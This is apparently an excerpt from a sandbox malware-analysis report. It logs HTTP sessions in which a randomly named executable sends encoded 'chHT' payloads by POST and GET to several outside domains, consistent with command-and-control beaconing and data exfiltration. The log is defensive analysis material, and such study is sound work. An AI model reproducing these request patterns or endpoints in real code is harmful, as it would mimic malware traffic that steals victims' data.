                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 77 39 7a 74 53 74 73 5a 72 61 48 51 78 61 62 46 65 33 79 6e 50 34 49 51 2f 39 53 56 56 44 30 76 32 55 45 66 37 68 59 66 39 38 4d 4a 32 30 43 66 4b 70 42 4a 47 4a 43 30 33 41 62 6a 48 4b 42 6a 59 46 47 48 57 77 78 66 63 4b 6b 48 4a 2f 4d 56 74 79 66 49 34 48 49 52 35 58 6e 47 41 36 51 77 58 77 76 36 53 30 6f 34 4e 62 35 63 67 38 63 79 77 69 37 37 79 5a 67 39 58 6f 2f 32 4b 6c 75 49 53 45 75 32 46 63 34 45 61 2f 51 46 6a 35 6f 31 52 70 33 2f 41 73 2f 73 4a 52 51 6d 2f 65 4e 50 44 67 48 [TRUNCATED]
                      Data Ascii: chHT=[TRUNCATED]
                      Sep 10, 2024 08:49:24.122045040 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:24 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.4 | 49753 | 185.173.111.76 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:26.071441889 CEST | 465 | OUT | GET /lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:26.732014894 CEST | 1230 | IN | HTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:26 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.4 | 49754 | 203.161.43.228 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:32.075406075 CEST | 716 | OUT | POST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 64 58 4e 52 58 49 6e 46 72 63 38 77 62 47 79 6c 55 32 57 69 69 41 36 6c 61 4d 49 59 4a 2f 47 4a 51 3d 3d
                      Data Ascii: chHT=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/ydXNRXInFrc8wbGylU2WiiA6laMIYJ/GJQ==
                      Sep 10, 2024 08:49:32.659810066 CEST | 658 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:32 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.4 | 49755 | 203.161.43.228 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:34.660859108 CEST | 736 | OUT | POST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 6b 4a 34 64 46 38 56 4b 43 50 53 58 62 55 4b 6e 35 4e 50 63 75 74 4a 48 38 32 6b 46 39 50 65 68 67 3d
                      Data Ascii: chHT=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwikJ4dF8VKCPSXbUKn5NPcutJH82kF9Pehg=
                      Sep 10, 2024 08:49:35.273550987 CEST | 658 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:35 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.4 | 49756 | 203.161.43.228 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:37.217359066 CEST | 10818 | OUT | POST /ftr3/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Origin: http://www.quilo.life
                      Referer: http://www.quilo.life/ftr3/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 74 61 37 61 53 45 6b 6c 6a 48 6d 78 73 7a 75 65 39 55 57 37 53 43 61 6d 44 33 46 56 46 45 52 75 53 67 55 58 42 42 31 48 70 66 43 45 37 4d 70 35 72 50 77 39 44 4a 70 5a 2b 4a 71 51 76 58 5a 4b 63 7a 70 79 64 6f 76 41 52 76 79 50 50 52 57 6c 42 59 66 39 51 48 7a 6c 2b 46 6b 51 34 2f 54 7a 61 48 4e 79 59 51 43 6c 4d 59 72 70 59 70 4e 71 63 71 6d 63 67 45 54 39 33 68 39 62 79 6a 56 4b 39 69 77 6a 64 49 68 36 76 2b 49 55 45 42 70 48 62 6d 70 39 65 66 46 4d 34 70 5a 51 4d 51 58 63 78 6a 68 [TRUNCATED]
                      Data Ascii: chHT=[TRUNCATED]
                      Sep 10, 2024 08:49:37.875740051 CEST | 658 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:37 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.4 | 49757 | 203.161.43.228 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:39.748734951 CEST | 457 | OUT | GET /ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.quilo.life
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:40.352597952 CEST | 673 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:49:40 GMT
                      Server: Apache
                      Content-Length: 514
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.4 | 49758 | 161.97.168.245 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:45.433249950 CEST | 731 | OUT | POST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 43 30 43 45 7a 65 4d 74 56 69 74 68 43 78 51 77 41 57 72 55 56 4d 4c 2b 47 34 58 59 59 42 71 72 51 3d 3d
                      Data Ascii: chHT=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YC0CEzeMtVithCxQwAWrUVML+G4XYYBqrQ==
                      Sep 10, 2024 08:49:46.076337099 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:45 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:46.076385975 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.4 | 49759 | 161.97.168.245 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:47.975758076 CEST | 751 | OUT | POST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
